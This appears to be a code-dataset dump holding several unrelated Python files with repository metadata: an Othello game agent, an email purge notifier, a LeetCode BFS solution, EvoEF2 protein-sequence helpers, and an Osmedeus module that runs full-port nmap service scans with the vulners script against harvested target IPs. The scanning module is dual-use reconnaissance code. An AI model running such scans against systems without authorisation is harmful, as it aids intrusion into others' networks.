Conv2D(2, (1, 1), activation='softmax', padding='same'),
])
model.summary()
model.load_weights("episode_1000.h5")
while True:
othello = Othello()
renderer = MLRenderer(path='./result/test-prob-')
agent1 = MLAgent(
othello, model, random_rate=0, no_reward=True, renderer=renderer)
agent2 = CliAgent(othello)
visualizer = Visualizer(othello, path=f'./result/test-')
othello.play()
| 28.270588 | 77 | 0.595922 | import sys
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization
from keras.utils import to_categorical
from othello_ml import Othello, Action
from othello_ml.visualizer import Visualizer
from train import MLAgent, MLRenderer
class CliAgent:
    """An othello agent driven by a human through the terminal: prints the
    board each turn and reads the move (or pass) from stdin."""
    def __init__(self, othello):
        # register our act() callback as one of the game's agents
        self.othello = othello
        othello.agent_actor(self.act)
    def act(self, board, turn, invalid_before):
        """Show the board and ask the user for a move.

        Returns (Action, is_pass); is_pass is truthy when the user passes
        or enters invalid coordinates."""
        if invalid_before:
            # previous move was rejected; ask for a legal one (Korean prompt)
            print("정상적인 수를 두시기 바랍니다.")
        # render the board: y = ours, n = opponent, O = empty
        # NOTE(review): 'x is 1' relies on CPython small-int interning;
        # '==' would be the safe comparison -- left unchanged here
        for row in board:
            print(
                "|", "|".join(
                    map(lambda x: 'y' if x is 1 else 'n' if x is -1 else 'O',
                        row)), "|")
        is_pass = 1 if input('패스입니까? yn') == 'y' else 0
        try:
            x = int(input('x:'))
            y = int(input('y:'))
        except:
            # non-numeric input: treat the turn as a pass (Korean notice)
            x = y = 0
            is_pass = True
            print('제대로 된 입력이 아니기 때문에 패스합니다.')
        action = Action(x=x, y=y)
        return action, is_pass
model = Sequential([
Conv2D(
32,
kernel_size=(3, 3),
input_shape=(8, 8, 1),
padding='same',
activation='relu'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(32, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(2, (1, 1), activation='softmax', padding='same'),
])
model.summary()
model.load_weights("episode_1000.h5")
while True:
othello = Othello()
renderer = MLRenderer(path='./result/test-prob-')
agent1 = MLAgent(
othello, model, random_rate=0, no_reward=True, renderer=renderer)
agent2 = CliAgent(othello)
visualizer = Visualizer(othello, path=f'./result/test-')
othello.play()
| 740 | -6 | 76 |
97612f727ccf4133b5ae131e8c1163a6d4f40bde | 4,098 | py | Python | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | python/warn_purge.py | OSGConnect/freesurfer_workflow | 304a7bde02bd68b2a55887f4bbe88a967ec7fd6b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2016 University of Chicago
# Licensed under the APL 2.0 license
import argparse
import subprocess
import sys
from email.mime.text import MIMEText
import psycopg2
import fsurfer.helpers
import fsurfer
VERSION = fsurfer.__version__
def email_user(workflow_id, email):
    """
    Email user informing them that a workflow will be deleted

    :param workflow_id: id for workflow that will be deleted
    :param email: email address for user
    :return: True on success, False on failure
    """
    logger = fsurfer.log.get_logger()
    msg = MIMEText('The results from your freesurfer ' +
                   'workflow {0} '.format(workflow_id) +
                   'will be deleted in 7 days, please download ' +
                   'them if you would like to save the results.')
    # BUGFIX: Message.__setitem__ *appends* a header rather than replacing
    # it, so the old "msg['Subject'] += ..." produced two Subject headers;
    # build the full subject string first and set it exactly once
    msg['Subject'] = ('Results for FSurf workflow {0} '.format(workflow_id) +
                      'will be deleted')
    sender = 'fsurf@login.osgconnect.net'
    dest = email
    msg['From'] = sender
    msg['To'] = dest
    try:
        sendmail = subprocess.Popen(['/usr/sbin/sendmail', '-t'], stdin=subprocess.PIPE)
        sendmail.communicate(msg.as_string())
        logger.info("Emailed {0} about purge for workflow {1}".format(email,
                                                                      workflow_id))
        return True
    # BUGFIX: Popen never raises CalledProcessError (only check_call/
    # check_output do); a missing sendmail binary raises OSError, so catch
    # that too to honour the documented "False on failure" contract
    except (OSError, subprocess.CalledProcessError) as e:
        logger.exception("Error emailing {0}: {1}".format(email, e))
        return False
def process_results():
    """
    Warn users whose COMPLETED or ERROR workflows finished 22 days ago
    that their results will be purged in 7 days (i.e. 30 days after the
    job date).

    :return: exit code (0 for success, non-zero for failure)
    """
    fsurfer.log.initialize_logging()
    logger = fsurfer.log.get_logger()
    parser = argparse.ArgumentParser(description="Process and remove old results")
    # version info
    parser.add_argument('--version', action='version', version='%(prog)s ' + VERSION)
    # Arguments for action
    parser.add_argument('--dry-run', dest='dry_run',
                        action='store_true', default=False,
                        help='Mock actions instead of carrying them out')
    parser.add_argument('--debug', dest='debug',
                        action='store_true', default=False,
                        help='Output debug messages')
    args = parser.parse_args(sys.argv[1:])
    if args.debug:
        fsurfer.log.set_debugging()
    if args.dry_run:
        sys.stdout.write("Doing a dry run, no changes will be made\n")
    conn = fsurfer.helpers.get_db_client()
    cursor = conn.cursor()
    # The 22-23 day window ensures each workflow is warned exactly once.
    job_query = "SELECT jobs.id, " \
                "       users.username, " \
                "       users.email, " \
                "       jobs.state, " \
                "       jobs.subject " \
                "FROM freesurfer_interface.jobs AS jobs, " \
                "     freesurfer_interface.users AS users "\
                "WHERE (state = 'COMPLETED' OR" \
                "       state = 'ERROR') AND" \
                "      (age(job_date) >= '22 days' AND " \
                "       age(job_date) < '23 days') AND" \
                "      jobs.username = users.username"
    try:
        cursor.execute(job_query)
        for row in cursor.fetchall():
            # row[0] = job id, row[1] = username, row[2] = email address.
            # (The original logged id and username swapped.)
            logger.info("Warning user {0} about workflow {1} purge".format(row[1],
                                                                           row[0]))
            if args.dry_run:
                # Trailing space added so the two writes do not run together.
                sys.stdout.write("Would email {0} ".format(row[2]))
                sys.stdout.write("about workflow {0}\n".format(row[0]))
                continue
            if not email_user(row[0], row[2]):
                logger.error("Can't email {0} for job {1}".format(row[2],
                                                                  row[0]))
                continue
            conn.commit()
    except psycopg2.Error as e:
        # 'except X, e' is Python 2-only syntax; 'as' works on 2.6+ and 3.x.
        logger.error("Got pgsql error: {0}".format(e))
        return 1
    finally:
        conn.commit()
        conn.close()
    return 0
if __name__ == '__main__':
sys.exit(process_results())
| 35.947368 | 88 | 0.552709 | #!/usr/bin/env python
# Copyright 2016 University of Chicago
# Licensed under the APL 2.0 license
import argparse
import subprocess
import sys
from email.mime.text import MIMEText
import psycopg2
import fsurfer.helpers
import fsurfer
VERSION = fsurfer.__version__
def email_user(workflow_id, email):
    """
    Email user informing them that a workflow will be deleted

    :param workflow_id: id for workflow that will be deleted
    :param email: email address for user
    :return: True on success, False on failure
    """
    logger = fsurfer.log.get_logger()
    msg = MIMEText('The results from your freesurfer ' +
                   'workflow {0} '.format(workflow_id) +
                   'will be deleted in 7 days, please download ' +
                   'them if you would like to save the results.')
    # Build the full subject first and assign it once:
    # email.message.Message.__setitem__ *appends* headers, so the original
    # "msg['Subject'] = ...; msg['Subject'] += ..." emitted two Subject
    # headers (a truncated one plus the full one).
    subject = 'Results for FSurf workflow {0} '.format(workflow_id)
    subject += 'will be deleted'
    msg['Subject'] = subject
    sender = 'fsurf@login.osgconnect.net'
    dest = email
    msg['From'] = sender
    msg['To'] = dest
    try:
        # '-t' makes sendmail read the recipients from the message headers.
        sendmail = subprocess.Popen(['/usr/sbin/sendmail', '-t'], stdin=subprocess.PIPE)
        sendmail.communicate(msg.as_string())
        logger.info("Emailed {0} about purge for workflow {1}".format(email,
                                                                      workflow_id))
        return True
    except subprocess.CalledProcessError as e:
        logger.exception("Error emailing {0}: {1}".format(email, e))
        return False
def process_results():
    """
    Warn users whose COMPLETED or ERROR workflows finished 22 days ago
    that their results will be purged in 7 days (i.e. 30 days after the
    job date).

    :return: exit code (0 for success, non-zero for failure)
    """
    fsurfer.log.initialize_logging()
    logger = fsurfer.log.get_logger()
    parser = argparse.ArgumentParser(description="Process and remove old results")
    # version info
    parser.add_argument('--version', action='version', version='%(prog)s ' + VERSION)
    # Arguments for action
    parser.add_argument('--dry-run', dest='dry_run',
                        action='store_true', default=False,
                        help='Mock actions instead of carrying them out')
    parser.add_argument('--debug', dest='debug',
                        action='store_true', default=False,
                        help='Output debug messages')
    args = parser.parse_args(sys.argv[1:])
    if args.debug:
        fsurfer.log.set_debugging()
    if args.dry_run:
        sys.stdout.write("Doing a dry run, no changes will be made\n")
    conn = fsurfer.helpers.get_db_client()
    cursor = conn.cursor()
    # The 22-23 day window ensures each workflow is warned exactly once.
    job_query = "SELECT jobs.id, " \
                "       users.username, " \
                "       users.email, " \
                "       jobs.state, " \
                "       jobs.subject " \
                "FROM freesurfer_interface.jobs AS jobs, " \
                "     freesurfer_interface.users AS users "\
                "WHERE (state = 'COMPLETED' OR" \
                "       state = 'ERROR') AND" \
                "      (age(job_date) >= '22 days' AND " \
                "       age(job_date) < '23 days') AND" \
                "      jobs.username = users.username"
    try:
        cursor.execute(job_query)
        for row in cursor.fetchall():
            # row[0] = job id, row[1] = username, row[2] = email address.
            # (The original logged id and username swapped.)
            logger.info("Warning user {0} about workflow {1} purge".format(row[1],
                                                                           row[0]))
            if args.dry_run:
                # Trailing space added so the two writes do not run together.
                sys.stdout.write("Would email {0} ".format(row[2]))
                sys.stdout.write("about workflow {0}\n".format(row[0]))
                continue
            if not email_user(row[0], row[2]):
                logger.error("Can't email {0} for job {1}".format(row[2],
                                                                  row[0]))
                continue
            conn.commit()
    except psycopg2.Error as e:
        # 'except X, e' is Python 2-only syntax; 'as' works on 2.6+ and 3.x.
        logger.error("Got pgsql error: {0}".format(e))
        return 1
    finally:
        conn.commit()
        conn.close()
    return 0
if __name__ == '__main__':
sys.exit(process_results())
| 0 | 0 | 0 |
4007bd3ce43e3f0e7d51f8a3424b1cbe9263a394 | 3,905 | py | Python | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | modules/vulnscan.py | vhssunny1/Osmedeus | 014a3e94632fb53979c43550f9e833a5b8409747 | [
"MIT"
] | null | null | null | import os, time
from core import execute
from core import slack
from core import utils
class VulnScan(object):
    ''' Scanning vulnerable service based version '''

    # Disabled helper kept for reference: it would convert the nmap XML
    # output into an HTML report via xsltproc and the nmap-bootstrap
    # stylesheet, writing it under $WORKSPACE/portscan/.
    # def conclude(self):
    #     #### Create beautiful HTML report for masscan
    #     cmd = "xsltproc -o $WORKSPACE/portscan/final-$OUTPUT.html $PLUGINS_PATH/nmap-bootstrap.xsl $WORKSPACE/vulnscan/{0}-nmap"
    #     cmd = utils.replace_argument(self.options, cmd)
    #     output_path = utils.replace_argument(
    #         self.options, '$WORKSPACE/portscan/final-$OUTPUT.html')
    #     std_path = utils.replace_argument(
    #         self.options, '')
    #     execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
| 44.375 | 134 | 0.593086 | import os, time
from core import execute
from core import slack
from core import utils
class VulnScan(object):
    ''' Scanning vulnerable service based version '''

    def __init__(self, options):
        """Run the full vulnerability-scan module for the given options dict."""
        # Announce the module and make sure the output directory exists.
        utils.print_banner("Vulnerable Scanning")
        utils.make_directory(options['WORKSPACE'] + '/vulnscan')
        self.module_name = self.__class__.__name__
        self.options = options
        # Skip the whole module if a previous run already completed
        # (unless the user forces a rerun with '-f').
        if utils.resume(self.options, self.module_name):
            utils.print_info(
                "It's already done. use '-f' options to force rerun the module")
            return
        self.is_direct = utils.is_direct_mode(options, require_input=True)
        # NOTE(review): this 'status' notification is sent *before* the scan
        # starts, yet its content already says "Done Vulnerable Scanning" -
        # looks like a copy/paste slip; confirm intended wording.
        slack.slack_noti('status', self.options, mess={
            'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
            'content': 'Done Vulnerable Scanning for {0}'.format(self.options['TARGET'])
        })
        self.initial()
        # Block until every command spawned by this module has finished.
        utils.just_waiting(self.options, self.module_name)
        # self.conclude()
        slack.slack_noti('good', self.options, mess={
            'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
            'content': 'Done Vulnerable Scanning for {0}'.format(self.options['TARGET'])
        })

    def initial(self):
        # Entry point for the module's scan steps.
        self.nmap_vuln()

    def nmap_vuln(self):
        """Run nmap with the vulners NSE script against every target IP."""
        utils.print_good('Starting Nmap VulnScan')
        if self.is_direct:
            # Direct mode: targets come straight from a user-supplied file.
            ip_list = utils.just_read(self.is_direct).splitlines()
            ip_list = list(set([ip for ip in ip_list if ip != 'N/A']))
        else:
            # Workspace mode: collect target IPs from the company JSON summary.
            main_json = utils.reading_json(utils.replace_argument(
                self.options, '$WORKSPACE/$COMPANY.json'))
            main_json['Modules'][self.module_name] = []
            if self.options['SPEED'] == 'slow':
                # Slow scan also covers the whole announced IP space.
                ip_list = [x.get("IP")
                           for x in main_json['Subdomains'] if x.get("IP") is not None] + main_json['IP Space']
            elif self.options['SPEED'] == 'quick':
                # Quick scan sticks to IPs resolved from subdomains.
                ip_list = [x.get("IP")
                           for x in main_json['Subdomains'] if x.get("IP") is not None]
            ip_list = list(set([ip for ip in ip_list if ip != 'N/A']))
        if self.options['DEBUG'] == 'True':
            # Debug mode: limit the run to the first five targets.
            ip_list = list(ip_list)[:5]
        # Scan 2 IPs at a time; raise the chunk size for more parallelism.
        for part in utils.chunks(ip_list, 2):
            for ip in part:
                cmd = 'sudo nmap -T4 -Pn -n -sSV -p- {0} --script $PLUGINS_PATH/vulners.nse --oA $WORKSPACE/vulnscan/{0}-nmap'.format(
                    ip.strip())
                cmd = utils.replace_argument(self.options, cmd)
                output_path = utils.replace_argument(
                    self.options, '$WORKSPACE/vulnscan/{0}-nmap.nmap'.format(ip.strip()))
                std_path = utils.replace_argument(
                    self.options, '$WORKSPACE/vulnscan/std-{0}-nmap.std'.format(ip.strip()))
                execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
            # Poll every 60 seconds until the current chunk has finished.
            while not utils.checking_done(self.options, module=self.module_name):
                time.sleep(60)
        # Persist the full command log for this run.
        logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')
        utils.save_all_cmd(self.options, logfile)

    # Disabled helper kept for reference: it would render the nmap XML
    # output as an HTML report via xsltproc.
    # def conclude(self):
    #     #### Create beautiful HTML report for masscan
    #     cmd = "xsltproc -o $WORKSPACE/portscan/final-$OUTPUT.html $PLUGINS_PATH/nmap-bootstrap.xsl $WORKSPACE/vulnscan/{0}-nmap"
    #     cmd = utils.replace_argument(self.options, cmd)
    #     output_path = utils.replace_argument(
    #         self.options, '$WORKSPACE/portscan/final-$OUTPUT.html')
    #     std_path = utils.replace_argument(
    #         self.options, '')
    #     execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
bd89371fe0d3e6dd7b20f2c829074cc008ed4a9c | 2,063 | py | Python | Python/minimum-genetic-mutation.py | xiaohalo/LeetCode | 68211ba081934b21bb1968046b7e3c1459b3da2d | [
"MIT"
] | 9 | 2019-06-30T07:15:18.000Z | 2022-02-10T20:13:40.000Z | Python/minimum-genetic-mutation.py | pnandini/LeetCode | e746c3298be96dec8e160da9378940568ef631b1 | [
"MIT"
] | 1 | 2018-07-10T03:28:43.000Z | 2018-07-10T03:28:43.000Z | Python/minimum-genetic-mutation.py | pnandini/LeetCode | e746c3298be96dec8e160da9378940568ef631b1 | [
"MIT"
] | 9 | 2019-01-16T22:16:49.000Z | 2022-02-06T17:33:41.000Z | # Time: O(n * b), n is the length of gene string, b is size of bank
# Space: O(b)
# A gene string can be represented by an 8-character long string,
# with choices from "A","C","G","T".
# Suppose we need to investigate about a mutation (mutation from "start" to "end"),
# where ONE mutation is defined as ONE single character changed in the gene string.
# For example, "AACCGGTT" -> "AACCGGTA" is 1 mutation.
# Also, there is a given gene "bank", which records all the valid gene mutations.
# A gene must be in the bank to make it a valid gene string.
#
# Now, given 3 things - start, end, bank,
# your task is to determine what is the minimum number of mutations needed to
# mutate from "start" to "end". If there is no such a mutation, return -1.
#
# NOTE: 1. Starting point is assumed to be valid, so it might not be included in the bank.
# 2. If multiple mutations are needed, all mutations during in the sequence must be valid.
#
# For example,
#
# bank: "AACCGGTA"
# start: "AACCGGTT"
# end: "AACCGGTA"
# return: 1
#
# bank: "AACCGGTA", "AACCGCTA", "AAACGGTA"
# start: "AACCGGTT"
# end: "AAACGGTA"
# return: 2
#
# bank: "AAAACCCC", "AAACCCCC", "AACCCCCC"
# start: "AAAAACCC"
# end: "AACCCCCC"
# return: 3
from collections import deque
| 30.791045 | 96 | 0.576345 | # Time: O(n * b), n is the length of gene string, b is size of bank
# Space: O(b)
# A gene string can be represented by an 8-character long string,
# with choices from "A","C","G","T".
# Suppose we need to investigate about a mutation (mutation from "start" to "end"),
# where ONE mutation is defined as ONE single character changed in the gene string.
# For example, "AACCGGTT" -> "AACCGGTA" is 1 mutation.
# Also, there is a given gene "bank", which records all the valid gene mutations.
# A gene must be in the bank to make it a valid gene string.
#
# Now, given 3 things - start, end, bank,
# your task is to determine what is the minimum number of mutations needed to
# mutate from "start" to "end". If there is no such a mutation, return -1.
#
# NOTE: 1. Starting point is assumed to be valid, so it might not be included in the bank.
# 2. If multiple mutations are needed, all mutations during in the sequence must be valid.
#
# For example,
#
# bank: "AACCGGTA"
# start: "AACCGGTT"
# end: "AACCGGTA"
# return: 1
#
# bank: "AACCGGTA", "AACCGCTA", "AAACGGTA"
# start: "AACCGGTT"
# end: "AAACGGTA"
# return: 2
#
# bank: "AAAACCCC", "AAACCCCC", "AACCCCCC"
# start: "AAAAACCC"
# end: "AACCCCCC"
# return: 3
from collections import deque
class Solution(object):
    def minMutation(self, start, end, bank):
        """
        BFS over the implicit mutation graph: each valid gene in `bank` is a
        node, and two genes are adjacent when they differ by one character.
        Returns the minimum number of mutations, or -1 if unreachable.

        :type start: str
        :type end: str
        :type bank: List[str]
        :rtype: int
        """
        # lookup maps each valid gene -> "already enqueued" flag.
        lookup = {}
        for b in bank:
            lookup[b] = False
        q = deque([(start, 0)])
        while q:
            cur, level = q.popleft()
            if cur == end:
                return level
            # `range` instead of Py2-only `xrange` so the code runs on
            # Python 3 as well (behavior is identical).
            for i in range(len(cur)):
                for c in ['A', 'T', 'C', 'G']:
                    if cur[i] == c:
                        continue
                    next_str = cur[:i] + c + cur[i+1:]
                    if next_str in lookup and lookup[next_str] == False:
                        q.append((next_str, level+1))
                        lookup[next_str] = True
        return -1
| 0 | 791 | 23 |
9d9248278db76a02b22d0694ae1d459fdc67c814 | 6,168 | py | Python | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 1 | 2021-08-01T21:23:21.000Z | 2021-08-01T21:23:21.000Z | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 10 | 2021-05-05T12:01:53.000Z | 2021-09-01T16:45:18.000Z | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 1 | 2021-08-14T14:26:16.000Z | 2021-08-14T14:26:16.000Z | """Functions for making EvoEF2 predictions."""
import ampal
import gzip
import glob
import subprocess
import multiprocessing
import os
from pathlib import Path
from benchmark import config
from sklearn.preprocessing import OneHotEncoder
import warnings
import numpy as np
import pandas as pd
def run_Evo2EF(
    pdb: str, chain: str, number_of_runs: str, working_dir: Path, path_to_evoef2: Path
) -> None:
    """Invoke the evo.sh helper script to predict a sequence with EvoEF2.

    Parameters
    ----------
    pdb: str
        PDB code.
    chain: str
        Chain code.
    number_of_runs: str
        Number of sequences to be generated.
    working_dir: Path
        Dir where to store temporary files and results.
    path_to_evoef2: Path
        Location of EvoEF2 executable.
    """
    print(f"Starting {pdb}{chain}.")
    # evo.sh is expected to live next to this module.
    script = os.path.join(os.path.dirname(os.path.realpath(__file__)), "evo.sh")
    process = subprocess.Popen(
        [script, pdb, chain, number_of_runs, working_dir, path_to_evoef2]
    )
    process.wait()
    print(f"{pdb}{chain} done.")
def multi_Evo2EF(
    df: pd.DataFrame,
    number_of_runs: int,
    working_dir: Path,
    path_to_assemblies: Path,
    path_to_evoef2: Path,
    max_processes: int = 8,
    nmr: bool = False,
) -> None:
    """Runs Evo2EF on all PDB chains in the DataFrame.

    Parameters
    ----------
    df: pd.DataFrame
        DataFrame with PDB and chain codes.
    number_of_runs: int
        Number of sequences to be generated for each PDB file.
    working_dir: Path
        Dir where to store temporary files and results.
    path_to_assemblies: Path
        Dir with biological assemblies.
    path_to_evoef2: Path
        Location of EvoEF2 executable.
    max_processes: int = 8
        Number of cores to use, default is 8.
    nmr: bool = False
        If True, read NMR entries (pdb{code}.ent.gz) and keep only the
        first model; otherwise read biological assemblies ({code}.pdb1.gz).
    """
    # Fix: string.ascii_uppercase is used below but the module never
    # imports `string`, so the assembly branch raised NameError.
    import string

    inputs = []
    # Remove duplicated chains so each PDB/chain pair is predicted once.
    df = df.drop_duplicates(subset=["PDB", "chain"])
    # Check if working directory exists. Make one if it doesn't exist.
    if not working_dir.exists():
        os.makedirs(working_dir)
    if not (working_dir / "results/").exists():
        os.makedirs(working_dir / "results/")
    print(f"{df.shape[0]} structures will be predicted.")
    for i, protein in df.iterrows():
        if not nmr:
            with gzip.open(
                path_to_assemblies / protein.PDB[1:3] / f"{protein.PDB}.pdb1.gz"
            ) as file:
                assembly = ampal.load_pdb(file.read().decode(), path=False)
            # Fuse all states of the assembly into one state to avoid EvoEF2 errors.
            empty_polymer = ampal.Assembly()
            chain_id = []
            for polymer in assembly:
                for chain in polymer:
                    empty_polymer.append(chain)
                    chain_id.append(chain.id)
            # Relabel chains to avoid repetition, remove ligands.
            str_list = string.ascii_uppercase.replace(protein.chain, "")
            index = chain_id.index(protein.chain)
            chain_id = list(str_list[: len(chain_id)])
            chain_id[index] = protein.chain
            empty_polymer.relabel_polymers(chain_id)
            pdb_text = empty_polymer.make_pdb(alt_states=False, ligands=False)
            # Writing a new pdb with AMPAL fixes most of the errors with EvoEF2.
            with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
                pdb_file.write(pdb_text)
        # Pick the first NMR structure.
        else:
            with gzip.open(
                path_to_assemblies / protein.PDB[1:3] / f"pdb{protein.PDB}.ent.gz"
            ) as file:
                assembly = ampal.load_pdb(file.read().decode(), path=False)
            pdb_text = assembly[0].make_pdb(alt_states=False)
            # Writing a new pdb with AMPAL fixes most of the errors with EvoEF2.
            with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
                pdb_file.write(pdb_text)
        inputs.append(
            (
                protein.PDB,
                protein.chain,
                str(number_of_runs),
                working_dir,
                path_to_evoef2,
            )
        )
    with multiprocessing.Pool(max_processes) as P:
        P.starmap(run_Evo2EF, inputs)
def seq_to_arr(working_dir: Path, user_list: Path, ignore_uncommon: bool = True):
    """Convert EvoEF2 sequence predictions into the benchmark-compatible format.

    working_dir: Path
        Dir where EvoEF2 results are stored.
    user_list: Path
        Path to .txt file with protein chains to include in the benchmark"""
    with open(Path(user_list)) as handle:
        chains = [line.strip('\n') for line in handle.readlines()]
    base_dir = Path(working_dir)
    residues = []
    encoder = OneHotEncoder(categories=[config.acids], sparse=False)
    with open(base_dir / 'datasetmap.txt', 'w') as mapping:
        mapping.write(f"ignore_uncommon {ignore_uncommon}\ninclude_pdbs\n##########\n")
        for protein in chains:
            result_file = base_dir / "results" / f"{protein}.txt"
            # Skip chains whose prediction file is absent or empty.
            if not result_file.exists() or os.path.getsize(result_file) == 0:
                warnings.warn(
                    f"EvoEF2: {protein} prediction does not exits."
                )
                continue
            with open(result_file) as prediction:
                seq = prediction.readline().split()[0]
            # EvoEF2 writes "0" when it failed to produce a sequence.
            if seq == "0":
                warnings.warn(
                    f"EvoEF2: {protein} prediction does not exits, EvoEF2 returned 0."
                )
                continue
            residues += list(seq)
            mapping.write(f"{protein} {len(seq)}\n")
    encoded = encoder.fit_transform(np.array(residues).reshape(-1, 1))
    pd.DataFrame(encoded).to_csv(base_dir / "evoEF2.csv", header=None, index=None)
| 34.651685 | 94 | 0.584468 | """Functions for making EvoEF2 predictions."""
import ampal
import gzip
import glob
import subprocess
import multiprocessing
import os
from pathlib import Path
from benchmark import config
from sklearn.preprocessing import OneHotEncoder
import warnings
import numpy as np
import pandas as pd
def run_Evo2EF(
    pdb: str, chain: str, number_of_runs: str, working_dir: Path, path_to_evoef2: Path
) -> None:
    """Invoke the evo.sh helper script to predict a sequence with EvoEF2.

    Parameters
    ----------
    pdb: str
        PDB code.
    chain: str
        Chain code.
    number_of_runs: str
        Number of sequences to be generated.
    working_dir: Path
        Dir where to store temporary files and results.
    path_to_evoef2: Path
        Location of EvoEF2 executable.
    """
    print(f"Starting {pdb}{chain}.")
    # evo.sh is expected to live next to this module.
    script = os.path.join(os.path.dirname(os.path.realpath(__file__)), "evo.sh")
    process = subprocess.Popen(
        [script, pdb, chain, number_of_runs, working_dir, path_to_evoef2]
    )
    process.wait()
    print(f"{pdb}{chain} done.")
def multi_Evo2EF(
    df: pd.DataFrame,
    number_of_runs: int,
    working_dir: Path,
    path_to_assemblies: Path,
    path_to_evoef2: Path,
    max_processes: int = 8,
    nmr: bool = False,
) -> None:
    """Runs Evo2EF on all PDB chains in the DataFrame.

    Parameters
    ----------
    df: pd.DataFrame
        DataFrame with PDB and chain codes.
    number_of_runs: int
        Number of sequences to be generated for each PDB file.
    working_dir: Path
        Dir where to store temporary files and results.
    path_to_assemblies: Path
        Dir with biological assemblies.
    path_to_evoef2: Path
        Location of EvoEF2 executable.
    max_processes: int = 8
        Number of cores to use, default is 8.
    nmr: bool = False
        If True, read NMR entries (pdb{code}.ent.gz) and keep only the
        first model; otherwise read biological assemblies ({code}.pdb1.gz).
    """
    # Fix: string.ascii_uppercase is used below but the module never
    # imports `string`, so the assembly branch raised NameError.
    import string

    inputs = []
    # Remove duplicated chains so each PDB/chain pair is predicted once.
    df = df.drop_duplicates(subset=["PDB", "chain"])
    # Check if working directory exists. Make one if it doesn't exist.
    if not working_dir.exists():
        os.makedirs(working_dir)
    if not (working_dir / "results/").exists():
        os.makedirs(working_dir / "results/")
    print(f"{df.shape[0]} structures will be predicted.")
    for i, protein in df.iterrows():
        if not nmr:
            with gzip.open(
                path_to_assemblies / protein.PDB[1:3] / f"{protein.PDB}.pdb1.gz"
            ) as file:
                assembly = ampal.load_pdb(file.read().decode(), path=False)
            # Fuse all states of the assembly into one state to avoid EvoEF2 errors.
            empty_polymer = ampal.Assembly()
            chain_id = []
            for polymer in assembly:
                for chain in polymer:
                    empty_polymer.append(chain)
                    chain_id.append(chain.id)
            # Relabel chains to avoid repetition, remove ligands.
            str_list = string.ascii_uppercase.replace(protein.chain, "")
            index = chain_id.index(protein.chain)
            chain_id = list(str_list[: len(chain_id)])
            chain_id[index] = protein.chain
            empty_polymer.relabel_polymers(chain_id)
            pdb_text = empty_polymer.make_pdb(alt_states=False, ligands=False)
            # Writing a new pdb with AMPAL fixes most of the errors with EvoEF2.
            with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
                pdb_file.write(pdb_text)
        # Pick the first NMR structure.
        else:
            with gzip.open(
                path_to_assemblies / protein.PDB[1:3] / f"pdb{protein.PDB}.ent.gz"
            ) as file:
                assembly = ampal.load_pdb(file.read().decode(), path=False)
            pdb_text = assembly[0].make_pdb(alt_states=False)
            # Writing a new pdb with AMPAL fixes most of the errors with EvoEF2.
            with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
                pdb_file.write(pdb_text)
        inputs.append(
            (
                protein.PDB,
                protein.chain,
                str(number_of_runs),
                working_dir,
                path_to_evoef2,
            )
        )
    with multiprocessing.Pool(max_processes) as P:
        P.starmap(run_Evo2EF, inputs)
def seq_to_arr(working_dir: Path, user_list: Path, ignore_uncommon: bool = True):
    """Convert EvoEF2 sequence predictions into the benchmark-compatible format.

    working_dir: Path
        Dir where EvoEF2 results are stored.
    user_list: Path
        Path to .txt file with protein chains to include in the benchmark"""
    with open(Path(user_list)) as handle:
        chains = [line.strip('\n') for line in handle.readlines()]
    base_dir = Path(working_dir)
    residues = []
    encoder = OneHotEncoder(categories=[config.acids], sparse=False)
    with open(base_dir / 'datasetmap.txt', 'w') as mapping:
        mapping.write(f"ignore_uncommon {ignore_uncommon}\ninclude_pdbs\n##########\n")
        for protein in chains:
            result_file = base_dir / "results" / f"{protein}.txt"
            # Skip chains whose prediction file is absent or empty.
            if not result_file.exists() or os.path.getsize(result_file) == 0:
                warnings.warn(
                    f"EvoEF2: {protein} prediction does not exits."
                )
                continue
            with open(result_file) as prediction:
                seq = prediction.readline().split()[0]
            # EvoEF2 writes "0" when it failed to produce a sequence.
            if seq == "0":
                warnings.warn(
                    f"EvoEF2: {protein} prediction does not exits, EvoEF2 returned 0."
                )
                continue
            residues += list(seq)
            mapping.write(f"{protein} {len(seq)}\n")
